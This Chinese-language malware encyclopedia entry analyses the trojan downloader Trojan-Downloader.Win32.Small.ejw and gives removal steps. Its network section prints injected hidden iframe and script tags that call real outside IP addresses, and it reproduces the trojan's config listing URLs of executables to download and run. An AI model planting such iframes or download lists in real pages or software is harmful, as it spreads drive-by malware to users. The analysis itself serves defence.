Trojan-Downloader.Win32.Small.ejw

Trojan-Downloader.Win32.Small.ejw病毒屬木馬類,病毒偽裝微軟版本信息,用以迷惑用戶。病毒運行後衍生病毒檔案到系統目錄下,連線網路下載病毒檔案,修改註冊表,創建服務,並以服務的方式達到隨機啟動的目的,刪除系統正常服務。嘗試結束卡巴斯基進程。

基本介紹

  • 外文名:Trojan-Downloader.Win32.Small.ejw
  • 病毒類型:木馬
  • 公開範圍:完全公開
  • 危害等級:4
病毒標籤,行為分析,清除方案,終止服務,

病毒標籤

檔案 MD5: 216221B8289779DAAB7405089391684F
檔案長度: 19,788 位元組
感染系統: windows98以上版本
開發工具: Microsoft Visual C++ 6.0
加殼類型: Xtreme-Protector v1.05

行為分析

1 、衍生病毒檔案到系統目錄下:
%system32%\d26bf5b8.dll
%system32%\d26bf5b8.exe
%system32%\d26bf5b8t.exe
2 、修改註冊表:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D26BF5B8\ImagePath
值 : 字元串: "C:\WINDOWS\system32\D26BF5B8.EXE -service"
3 、開啟服務:
服務名稱: D26BF5B8
顯示名稱: D26BF5B8
描述: D26BF5B8
執行檔的路徑: C:\WINDOWS\system32\D26BF5B8.EXE
啟動方式:自動
4 、關閉系統正常服務 ERSVC:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc
鍵值 : 字串: "Description"="服務和應用程式在非標準環境下運行時允許錯誤報告"
5 、連線網路:
<script language="javascript"
src="http://count6.51yes.com/click.aspx?id=63610940&logo=1"></script>
<iframe height="0" width="0"
src="http://59.34.197.164:81/808080/ad2881.asp"></iframe>
<iframe height="0" width="0"
src="http://59.34.197.164:81/80444/ad2715fg.asp"></iframe>
<iframe height="0" width="0" src="http://www.sxrf.gov.cn"></iframe>
<iframe height="0" width="0"
src="http://59.34.197.164:81/88888/ad56d.asp"></iframe>
<iframe height="0" width="0" src="http://www.gansusteel.com"></iframe>
<iframe height="0" width="0" src="http://www.east128.com/about.asp"></iframe>
<iframe height="0" width="0" src="http://dongman.0937.net"></iframe>
<iframe height="0" width="0" src="http://suremo.cn"></iframe>
<iframe height="0" width="0" src="http://www.jkdj.cn"></iframe>
<iframe height="0" width="0" src="http://www.cnkmd.com"></iframe>
<iframe height="0" width="0" src="http://www.xinwanyu.com"></iframe>
<iframe height="0" width="0" src="http://hejianwu.com"></iframe>
<iframe height="0" width="0" src="http://59.34.197.164:81/80465551/ad28781.asp">
/iframe>
<iframe height="0" width="0"
src="http://59.34.197.164:81/808080/ad2881.asp"></iframe>
<iframe src='http://59.34.197.239/in.asp?newwebname=1' width='0' height='0'
frameborder='0'></iframe>
<script language="javascript" src="http://59.34.197.239/in.js"></script>
6 、該木馬有盜取用戶敏感信息的功能,連線網路,下載病毒檔案到本機運行:
[update]
ver=0
url=http://127.0.0.1/
timer=1
[startpage]
startpage=0
url=http://www.sina.com.cn1
[favorites]
favorites=0
count=0
[desktop]
desktop=0
count=0
[popwin]
popwin=0
count=0
[addrpop]
addrpop=0
[alexa]
alexa=1
fileurl=http://www.al*x*.com/1.exe
url1=http://nba.9*6*k.com/2.htm
url2=http://5*.3*.1*7.1*4:81/808080/ad2881.asp
rl3=http://5*.3*.1*7.1*4:81/80444/ad2715fg.asp
url4=http://5*.3*.1*7.1*4:81/8046338888/ad285367.asp
url5=http://5*.3*.1*7.1*4:81/8046555/ad2878.asp
url6=http://5*.3*.1*7.1*4:81/80444/ad2715.asp
url7=http://www.u**s*e.com/top.html
url8=http://www.it*o*ns.com
url9=http://www.j*d*.cn
url10=http://www.*x*f.gov.cn
url11=http://www.g*ns*st*el.com
url12=http://5*.3*.1*7.1*4:81/88888/ad56d.asp
url13=http://www.y*h*l*ng.com
url14=http://5*.3*.1*7.1*4:81/8046222/ad2714.asp
url15=http://5*.3*.1*7.1*4:81/80465551/ad28781.asp
count=15
[im]
im=0
msg= 你好啊,兄弟! http://www.s*n*.com.cn
qq=0
popo=0
uc=0
taobao=0
[file]
file=1
file1=http://www.t*o1*81*8.com/mh.exe
filename1=sthu1.exe
file2=http://h&inf*lm.cn/obug.exe
filename2=sthu2.exe
file3=http://www.t*o1*81*8.com/qq.exe
filename3=sthu3.exe
file4=http://imgbbs.sh*ngd*.com/bbs.shangdu.com/3/227/464355/file/gz.exe
filename4=sthu4.exe
file5=http://www.t*o1*81*8.com/12.exe
filename5=sthu5.exe
file6=http://www.y*-m*ng.com/bbs/geawe/fsgd/treter/1.exe
filename6=sthu6.exe
file7=http://www.t*o1*81*8.com/yk.exe
filename7=sthu7.exe
file8=http://jd.54l*um*ng.com/lm/one.exe
filename8=sthu8.exe
count=8
[count]
count=1
mecount=1
url=http://nba.9*6*k.com/lm/count/count.asp
7 、該病毒嘗試關閉卡巴斯基進程。
註: % System%是一個可變路徑。病毒通過查詢作業系統來決定當前System資料夾的位置。Windows2000/NT中默認的安裝路徑是C:\Winnt\System32,windows95/98/me中默認的安裝路徑是C:\Windows\System,windowsXP中默認的安裝路徑是C:\Windows\System32。

清除方案

1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )
2 、 手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1) 使用 安天木馬防線進程管理”關閉病毒進程
終止所有IE進程
(2) 刪除病毒檔案
%system32%\d26bf5b8.dll
%system32%\d26bf5b8.exe
%system32%\d26bf5b8t.exe
(3) 恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項

終止服務

D26BF5B8

相關詞條

熱門詞條

聯絡我們